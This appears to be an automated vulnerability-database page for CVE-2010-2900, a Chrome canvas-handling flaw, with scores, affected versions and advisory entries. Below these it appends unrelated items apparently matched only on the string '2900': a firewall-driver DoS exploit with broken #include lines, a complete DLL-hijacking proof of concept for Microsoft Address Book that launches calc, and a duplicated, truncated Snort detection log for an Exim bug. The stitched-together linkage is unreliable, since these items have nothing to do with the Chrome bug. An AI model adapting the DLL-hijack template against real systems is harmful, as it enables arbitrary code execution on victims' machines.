CVE-2010-2900
published 2010-07-28CVE-2010-2900: Google Chrome before 5.0.375.125 does not properly handle a large canvas, which has unspecified impact and remote attack vectors.
PriorityP427critical10CVSS 2.0
AVNACLAuNCCICAC
EPSS
1.03%
60.3th percentile
Google Chrome before 5.0.375.125 does not properly handle a large canvas, which has unspecified impact and remote attack vectors.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chrome | < 5.0.375.125 | 5.0.375.125 | |
| webkitgtk | webkitgtk | >= 0 < 2.4.8-1ubuntu1~ubuntu14.04.1 | 2.4.8-1ubuntu1~ubuntu14.04.1 |
| webkitgtk | webkitgtk | >= 0 < 2.4.9-2ubuntu2 | 2.4.9-2ubuntu2 |
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qgmf-q57g-v9ww: Google Chrome before 5
ghsa_unreviewed·2022-05-13
CVE-2010-2900 [HIGH] GHSA-qgmf-q57g-v9ww: Google Chrome before 5
Google Chrome before 5.0.375.125 does not properly handle a large canvas, which has unspecified impact and remote attack vectors.
OSV
CVE-2010-2900: Google Chrome before 5
osv·2010-07-28·CVSS 10.0
CVE-2010-2900 [CRITICAL] CVE-2010-2900: Google Chrome before 5
Google Chrome before 5.0.375.125 does not properly handle a large canvas, which has unspecified impact and remote attack vectors.
Ubuntu
WebKit vulnerabilities
vendor_ubuntu·2011-08-23
CVE-2010-1824 WebKit vulnerabilities
Title: WebKit vulnerabilities
Summary: Multiple security vulnerabilities were fixed in WebKit.
A large number of security issues were discovered in the WebKit browser and
JavaScript engines. If a user were tricked into viewing a malicious
website, a remote attacker could exploit a variety of issues related to web
browser security, including cross-site scripting attacks, denial of
service attacks, and arbitrary code execution.
Instructions: After a standard system update you need to restart any applications that
use WebKit, such as Epiphany and Midori, to make all the necessary changes.
No detection rules found.
Exploit-DB
Look n stop - Local Denial of Service
exploitdb·2011-01-21
CVE-2011-0652 Look n stop - Local Denial of Service
Look n stop - Local Denial of Service
---
#include
#include
#include
#include
#include
/*
Program : Look 'n' Stop 2.06p4 / 2.07 (6.0.2900.5512)
Homepage : http://www.looknstop.com
Discovery : 2009/11/08
Author Contacted : 2010/07/15 ... no reply
Found by : Heurs
This Advisory : Heurs
Contact : [email protected]
//----- Application description
Look 'n' Stop Firewall 2.07 provides key features to protect your computer
against cyber threats. It prevents malicious programs from transmitting the
data of your computer to hacker's computers. Look 'n' Stop Firewall 2.07
also protects your computer from external intrusions.
//----- Description of vulnerability
lnsfw1.sys driver generate a BSOD with particular value of IOCTL. Kernel wait
an action with a kernel debugger.
//----- Credit
Exploit-DB
Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking
exploitdb·2010-08-25
CVE-2010-3147 Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking
Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking
---
/*
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora , Anirban , Dinesh Arora
# Site : www.beenuarora.com
Exploit Title: Microsoft Address Book DLL Hijacking
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 , Microsoft Address Book 6.00.2900.5512
Vulnerable extensions: wab , p7c
Compile and rename to wab32res.dll, create a file in the same dir with one
of the following extensions:
.wab,p7c
*/
#include
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void hook_startup() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14745.zip
Talos
Exim Remote Root
blogs_talos·2010-12-14·CVSS 9.8
CVE-2010-4344 [CRITICAL] Exim Remote Root
## Exim Remote Root
We've heard from a number of Sourcefire customers and open-source Snort users lately, asking us whether we'll be releasing coverage for last week's Exim remote root ( CVE-2010-4344 for those keeping score at home). Based on what hit the Exim-dev mailing list, we felt confident that the SMTP preprocessor would catch the vulnerability; after testing with the proof-of-concept sent to the Full-Disclosure mailing list on Saturday, we've confirmed that SID 124:2:1 does the job nicely:
# ~/snort-2.9.0$ src/snort -c etc/snort.2900.conf -q -A cmg -r ~/pcaps/cve-2010-4344-full-disclosure.pcap
12/14-09:15:37.145472 [**] [124:2:1] (smtp) Attempted data header buffer overflow: 2896 chars [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.1.11.11:3
Talos
Exim Remote Root
blogs_talos·2010-12-14·CVSS 9.8
CVE-2010-4344 [CRITICAL] Exim Remote Root
We've heard from a number of Sourcefire customers and open-source Snort users lately, asking us whether we'll be releasing coverage for last week's Exim remote root (CVE-2010-4344 for those keeping score at home). Based on what hit the Exim-dev mailing list, we felt confident that the SMTP preprocessor would catch the vulnerability; after testing with the proof-of-concept sent to the Full-Disclosure mailing list on Saturday, we've confirmed that SID 124:2:1 does the job nicely:
```
# ~/snort-2.9.0$ src/snort -c etc/snort.2900.conf -q -A cmg -r ~/pcaps/cve-2010-4344-full-disclosure.pcap
12/14-09:15:37.145472 [**] [124:2:1] (smtp) Attempted data header buffer overflow: 2896 chars [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.1.11.11:35781 -> 10.1.11.11
http://code.google.com/p/chromium/issues/detail?id=43813http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.htmlhttp://secunia.com/advisories/40743https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11818http://code.google.com/p/chromium/issues/detail?id=43813http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.htmlhttp://secunia.com/advisories/40743https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11818
2010-07-28
Published